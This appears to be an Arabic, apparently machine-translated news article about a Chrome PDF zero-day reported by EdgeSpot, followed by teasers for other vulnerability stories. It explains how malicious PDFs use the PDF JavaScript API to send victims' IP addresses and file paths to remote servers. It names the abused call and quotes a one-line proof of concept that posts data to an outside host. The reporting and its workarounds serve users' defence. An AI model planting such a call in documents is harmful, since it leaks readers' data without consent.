تسمح مشكلة عدم حصانة Chrome للمتسللين بجمع بيانات المستخدم عبر ملفات pdf
جدول المحتويات:
فيديو: احتجاجا على غلاء الفواتير بتازة 2 2024
اكتشاف خدمة اكتشاف اكتشف EdgeSpot مشكلة عدم حصانة في يوم الصفر في Chrome تستغل مستندات PDF. تسمح الثغرة للمهاجمين بجمع البيانات الحساسة باستخدام مستندات PDF الضارة المفتوحة في Chrome.
بمجرد أن يفتح الضحية ملفات PDF المعنية في Google Chrome ، يبدأ برنامج ضار بالعمل في الخلفية من خلال جمع بيانات المستخدم.
ثم يتم إعادة توجيه البيانات إلى الخادم البعيد الذي يتحكم فيه المتسللون. قد تتساءل عن البيانات التي يمتصها المهاجمون ، فهم يستهدفون البيانات التالية على جهاز الكمبيوتر الخاص بك:
- عنوان IP
- المسار الكامل لملف PDF على النظام
- إصدارات نظام التشغيل وكروم
حذار من ملفات PDF الخبيثة من البرامج الضارة
قد تفاجأ بمعرفة أنه لا يوجد شيء يحدث عند استخدام Adobe Reader لفتح ملفات PDF. بالإضافة إلى ذلك ، تُستخدم طلبات HTTP POST لنقل البيانات إلى الخوادم البعيدة دون تدخل من المستخدم.
اكتشف الخبراء أن أحد المجالين readnotifycom أو burpcollaboratornet كان يتلقى البيانات.
يمكنك أن تتخيل شدة الهجوم من خلال النظر في حقيقة أن معظم برامج مكافحة الفيروسات غير قادرة على اكتشاف العينات التي اكتشفها EdgeSpot.
يكشف الخبراء أن المهاجمين يستخدمون "this.submitForm ()" PDF Javascript API لجمع المعلومات الحساسة للمستخدمين.
لقد اختبرناها باستخدام الحد الأدنى من PoC ، فإن استدعاء API البسيط مثل "this.submitForm ('http://google.com/test')" سيجعل Google Chrome يرسل البيانات الشخصية إلى google.com.
اكتشف الخبراء في الواقع أن خطأ Chrome هذا تم استغلاله بواسطة مجموعتين متميزتين من ملفات PDF الضارة. تم توزيع كل منهما في أكتوبر 2017 وسبتمبر 2018 ، على التوالي.
والجدير بالذكر أن المهاجمين يمكن استخدام البيانات التي تم جمعها لضبط الهجمات في المستقبل. تشير التقارير إلى أنه تم تجميع الدفعة الأولى من الملفات باستخدام خدمة تتبع PDF في ReadNotify.
يمكن للمستخدمين الاستفادة من الخدمة لتتبع مشاهدات المستخدم. لم تشارك EdgeSpot أي تفاصيل تتعلق بطبيعة المجموعة الثانية من ملفات PDF.
كيفية البقاء محمي
أرادت خدمة اكتشاف الاستغلال EdgeSpot تنبيه مستخدمي Chrome إلى المخاطر المحتملة لأنه من غير المتوقع أن يتم إصدار التصحيح في المستقبل القريب.
أبلغت EdgeSpot Google عن مدى الضعف العام الماضي ووعدت الشركة بإصدار تصحيح في أواخر أبريل. هيدروجين
ومع ذلك ، يمكنك التفكير في استخدام حل مؤقت للمشكلة من خلال عرض مستندات PDF المستلمة محليًا باستخدام تطبيق قارئ PDF بديل.
بدلاً من ذلك ، يمكنك أيضًا فتح مستندات PDF الخاصة بك في Chrome عن طريق فصل أنظمتك عن الإنترنت. وفي الوقت نفسه ، يمكنك انتظار تحديث Chrome 74 الذي من المتوقع أن يتم طرحه في 23 أبريل.
مشكلة عدم حصانة أمان Windows gdi32.dll التي تم إصلاحها بواسطة 0patch لجهة خارجية
في الآونة الأخيرة ، لا يكاد يكون مفاجأة في سماع أن الشركة تواجه مشكلة أمنية. تعد Microsoft نفسها واحدة من أحدث الضحايا ، حيث تم اكتشاف ثغرات أمنية حديثة في العديد من خدمات Microsoft ، بما في ذلك Windows إلى جانب Internet Explorer و Microsoft Edge. Microsoft قيد التقاطع في Project Zero تم التقاط مشكلات Microsoft بواسطة Project Zero ، وهو ...
تصدر Microsoft تحديث Windows 7 kb3178034 لتصحيح مشكلة عدم حصانة التعليمات البرمجية عن بُعد
لم تتخلى شركة Microsoft عن مستخدمي Windows 7: فقد قدمت تحديثًا أمنيًا جديدًا لتصحيح ثغرة أمنية تم اكتشافها مؤخرًا. قد تسمح مشكلة عدم الحصانة هذه بتنفيذ التعليمات البرمجية عن بُعد إذا قام المستخدمون إما بزيارة موقع ويب تم إنشاؤه خصيصًا أو فتح مستند تم إنشاؤه خصيصًا. إذا قمت بتعيين الكمبيوتر لتثبيت التحديثات تلقائيًا ، فسيكون KB3178034 مثبتًا بالفعل ...
تسمح مشكلة عدم حصانة Outlook للمتسللين بسرقة تجزئة كلمة المرور
يعد Microsoft Outlook أحد أكثر أنظمة البريد الإلكتروني شيوعًا في العالم. أنا شخصياً أعتمد على عنوان البريد الإلكتروني الخاص بـ Outlook للمهام المتعلقة بالعمل وكذلك المهام الشخصية. لسوء الحظ ، قد لا يكون Outlook آمنًا كما نود المستخدمين التفكير فيه. وفقًا لتقرير نشره معهد كارنيجي ميلون لهندسة البرمجيات ، فإن Outlook ...
